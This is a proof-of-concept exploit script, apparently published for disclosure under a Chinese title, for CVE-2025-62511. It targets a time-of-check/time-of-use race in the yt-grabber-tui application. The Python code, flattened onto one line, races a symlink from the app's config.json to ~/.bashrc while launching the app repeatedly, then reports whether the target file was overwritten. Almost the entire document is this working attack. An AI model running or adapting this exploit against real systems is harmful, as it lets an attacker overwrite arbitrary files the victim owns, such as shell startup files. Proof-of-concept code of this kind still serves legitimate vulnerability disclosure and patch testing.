CVE-2025-62511 yt-grabber-tui TOCTOU竞争条件任意文件覆盖漏洞

#!/usr/bin/env python3 """ CVE-2025-62511 PoC - TOCTOU Race Condition in yt-grabber-tui config.json creation This PoC demonstrates the TOCTOU race condition exploitation by rapidly creating symlinks in the config directory between the existence check and file write. """ import os import sys import time import threading import subprocess import shutil CONFIG_DIR = os.path.expanduser("~/.config/yt-grabber-tui") CONFIG_FILE = os.path.join(CONFIG_DIR, "config.json") TARGET_FILE = os.path.expanduser("~/.bashrc") # Target file to overwrite def cleanup(): """Clean up any existing config directory or symlinks""" if os.path.exists(CONFIG_FILE) or os.path.islink(CONFIG_FILE): try: os.unlink(CONFIG_FILE) except OSError: pass if os.path.isdir(CONFIG_DIR) and not os.listdir(CONFIG_DIR): os.rmdir(CONFIG_DIR) def race_symlink_creator(stop_event): """ Continuously create and remove symlinks to win the race condition. This runs in a tight loop to maximize the chance of the symlink being created between the existence check and the file write. """ while not stop_event.is_set(): try: # Remove existing file/symlink if present if os.path.exists(CONFIG_FILE) or os.path.islink(CONFIG_FILE): os.unlink(CONFIG_FILE) # Create symlink pointing to attacker-chosen target file os.symlink(TARGET_FILE, CONFIG_FILE) # Brief sleep to allow the application to write through the symlink time.sleep(0.001) except OSError: # If symlink already exists or other error, retry time.sleep(0.0001) def trigger_application(): """Run the yt-grabber-tui application to trigger the vulnerable code path""" try: # Execute the application - it will check for config.json and try to create it subprocess.run( ["yt-grabber-tui"], timeout=5, capture_output=True ) except (subprocess.TimeoutExpired, FileNotFoundError): pass def verify_exploitation(): """Check if the target file has been overwritten with JSON content""" if os.path.islink(CONFIG_FILE): # Symlink still exists - check if target was modified try: with open(TARGET_FILE, 'r') as f: content = f.read() if '{' in content and '}' in content: print(f"[+] SUCCESS: Target file {TARGET_FILE} has been overwritten!") print(f"[+] First 200 chars of overwritten content: {content[:200]}") return True except (PermissionError, OSError): print(f"[-] Cannot read target file (may need elevated privileges)") return False def main(): print(f"[*] CVE-2025-62511 PoC - yt-grabber-tui TOCTOU Race Condition") print(f"[*] Config directory: {CONFIG_DIR}") print(f"[*] Target file: {TARGET_FILE}") print() # Clean up before exploitation cleanup() # Ensure config directory exists os.makedirs(CONFIG_DIR, exist_ok=True) stop_event = threading.Event() max_attempts = 50 for attempt in range(1, max_attempts + 1): print(f"[*] Attempt {attempt}/{max_attempts}...") # Clean up any previous artifacts if os.path.islink(CONFIG_FILE): os.unlink(CONFIG_FILE) # Start the symlink creator thread symlink_thread = threading.Thread(target=race_symlink_creator, args=(stop_event,)) symlink_thread.daemon = True symlink_thread.start() # Small delay to let symlink creator start time.sleep(0.01) # Trigger the application trigger_application() # Stop the symlink creator stop_event.set() symlink_thread.join(timeout=2) stop_event.clear() # Check if exploitation was successful if verify_exploitation(): print(f"\n[+] Exploitation successful after {attempt} attempt(s)!") sys.exit(0) # Clean up for next attempt if os.path.islink(CONFIG_FILE): os.unlink(CONFIG_FILE) print(f"\n[-] Exploitation failed after {max_attempts} attempts.") print("[-] The application may not be installed or the race window is too small.") cleanup() sys.exit(1) if __name__ == "__main__": main()